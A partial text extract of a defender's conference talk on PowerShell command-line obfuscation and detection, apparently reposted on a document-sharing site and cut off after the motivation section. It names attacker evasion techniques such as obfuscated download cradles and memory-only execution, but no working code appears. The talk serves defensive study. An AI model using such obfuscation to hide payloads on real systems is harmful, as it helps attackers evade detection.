PowerShell Command Line Argument Obfuscation Techniques

Invoke-Obfuscation:

PowerShell obFUsk8tion Techniques & How To (Try To)

D""e`Tec`T 'Th'+'em'

Daniel Bohannon @danielhbohannon

Who I Am

? Daniel Bohannon ? @danielhbohannon , ? Blue Team w/increasing exposure to Red Team ? Incident Response Consultant @ Mandiant (1.5yrs) ? Previously 5yrs in IT Operations and Security role for national restaurant franchise

Shortage of memes cat pictures

415-140707115516-560.Purrmanently-Sad-Cat-kitten.ls.7814.jpg

Outline:

? Motivation ? Preparing Your Environment for Investigating PowerShell ? Obfuscating the Cradle: (New-Object Net.WebClient) ? Additional Methods for Remote Download ? More Obfuscation Techniques and Detection Attempts ? What's Old Is New: Encoding/Decoding with PS 1.0 ? Launch Techniques ? Invoke-Obfuscation Demo

Motivation

? PowerShell as an attack platform and post-exploitation framework is an everincreasing trend

? Native and signed Windows binary in Windows Vista and later ? Memory only execution capabilities (evade A/V and application whitelisting) ? Ever-expanding set of attack frameworks

? Used by advanced attackers, script kiddies and penetration testers in both targeted attacks and commodity malware

? Nearly impossible to detect if command line arguments and/or PowerShell event logs are not logged and monitored

................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download

To fulfill the demand for quickly locating and searching documents.

It is intelligent file search solution for home and business.

Literature Lottery

Related download
Related searches

©2024 5y1.org, Inc. All rights reserved.